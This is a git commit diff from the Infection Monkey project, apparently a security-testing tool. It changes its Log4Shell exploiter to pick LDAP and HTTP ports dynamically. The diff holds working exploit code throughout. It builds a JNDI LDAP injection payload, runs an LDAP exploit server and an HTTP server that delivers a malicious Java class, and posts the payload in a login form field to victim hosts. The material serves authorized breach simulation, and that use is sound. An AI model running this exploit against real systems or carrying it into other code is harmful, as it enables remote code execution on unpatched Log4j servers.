Agent: change ldap and http ports to be chosen dynamically in log4shell

This commit is contained in:
vakarisz 2022-01-05 12:04:21 +02:00
parent 0659fddac6
commit 8a120110f5
2 changed files with 14 additions and 20 deletions

View File

@ -19,6 +19,7 @@ from infection_monkey.model import (
MONKEY_ARG, MONKEY_ARG,
VictimHost, VictimHost,
) )
from infection_monkey.network.info import get_free_tcp_port
from infection_monkey.network.tools import get_interface_to_target from infection_monkey.network.tools import get_interface_to_target
from infection_monkey.utils.commands import build_monkey_commandline from infection_monkey.utils.commands import build_monkey_commandline
from infection_monkey.utils.monkey_dir import get_monkey_dir_path from infection_monkey.utils.monkey_dir import get_monkey_dir_path
@ -30,13 +31,13 @@ class Log4ShellExploiter(WebRCE):
_TARGET_OS_TYPE = ["linux", "windows"] _TARGET_OS_TYPE = ["linux", "windows"]
EXPLOIT_TYPE = ExploitType.VULNERABILITY EXPLOIT_TYPE = ExploitType.VULNERABILITY
_EXPLOITED_SERVICE = "Log4j" _EXPLOITED_SERVICE = "Log4j"
LDAP_PORT = 8080
CLASS_HTTP_SERVER_PORT = 1337
DOWNLOAD_TIMEOUT = 15 DOWNLOAD_TIMEOUT = 15
def __init__(self, host: VictimHost): def __init__(self, host: VictimHost):
super().__init__(host) super().__init__(host)
self._client = None self._client = None
self.ldap_port = get_free_tcp_port()
self.class_http_server_port = get_free_tcp_port()
def exploit_host(self): def exploit_host(self):
@ -53,15 +54,13 @@ class Log4ShellExploiter(WebRCE):
java_class = self.build_java_class(command) java_class = self.build_java_class(command)
class_http_server_ip = get_interface_to_target(self.host.ip_addr) class_http_server_ip = get_interface_to_target(self.host.ip_addr)
java_class_http_thread = Log4ShellExploiter.get_java_class_server_thread( java_class_http_thread = self.get_java_class_server_thread(class_http_server_ip, java_class)
class_http_server_ip, java_class
)
java_class_http_thread.start() java_class_http_thread.start()
ldap = LDAPExploitServer( ldap = LDAPExploitServer(
ldap_server_port=Log4ShellExploiter.LDAP_PORT, ldap_server_port=self.ldap_port,
http_server_ip=class_http_server_ip, http_server_ip=class_http_server_ip,
http_server_port=self.CLASS_HTTP_SERVER_PORT, http_server_port=self.class_http_server_port,
storage_dir=get_monkey_dir_path(), storage_dir=get_monkey_dir_path(),
) )
ldap_thread = ldap.get_run_thread() ldap_thread = ldap.get_run_thread()
@ -86,7 +85,7 @@ class Log4ShellExploiter(WebRCE):
def build_ldap_payload(self): def build_ldap_payload(self):
interface_ip = get_interface_to_target(self.host.ip_addr) interface_ip = get_interface_to_target(self.host.ip_addr)
return f"${{jndi:ldap://{interface_ip}:{Log4ShellExploiter.LDAP_PORT}/dn=Exploit}}" return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}"
# TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command # TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
def build_command(self, path, http_path): def build_command(self, path, http_path):
@ -133,20 +132,15 @@ class Log4ShellExploiter(WebRCE):
self.wfile.write(self.java_class) self.wfile.write(self.java_class)
Log4ShellExploiter.HTTPHandler.class_downloaded = True Log4ShellExploiter.HTTPHandler.class_downloaded = True
@staticmethod def _run_class_http_server(self, ip):
def _run_class_http_server(ip): server = http.server.HTTPServer((ip, self.class_http_server_port), Log4ShellExploiter.HTTPHandler)
server = http.server.HTTPServer(
(ip, Log4ShellExploiter.CLASS_HTTP_SERVER_PORT), Log4ShellExploiter.HTTPHandler
)
while ( while (
not Log4ShellExploiter.HTTPHandler.class_downloaded not Log4ShellExploiter.HTTPHandler.class_downloaded
and not Log4ShellExploiter.HTTPHandler.stop and not Log4ShellExploiter.HTTPHandler.stop
): ):
server.handle_request() server.handle_request()
@staticmethod def get_java_class_server_thread(self, ip: str, java_class: bytes):
def get_java_class_server_thread(ip: str, java_class: bytes):
Log4ShellExploiter.HTTPHandler.java_class = java_class Log4ShellExploiter.HTTPHandler.java_class = java_class
return Thread(target=Log4ShellExploiter._run_class_http_server, args=[ip]) return Thread(target=self._run_class_http_server, args=[ip])

View File

@ -13,9 +13,9 @@ def trigger_exploit(payload: str, host: VictimHost, open_ports: List[int]):
payload = {"uname": payload, "password": "m0nk3y"} payload = {"uname": payload, "password": "m0nk3y"}
for url in urls: for url in urls:
try: try:
requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123 resp = requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
except requests.ReadTimeout: except requests.ReadTimeout as e:
logger.debug("Couldn't send request to the vulnerable machine") logger.debug(f"Log4shell request failed {e}")
def build_urls(open_ports: List[int], host: VictimHost) -> List[str]: def build_urls(open_ports: List[int], host: VictimHost) -> List[str]: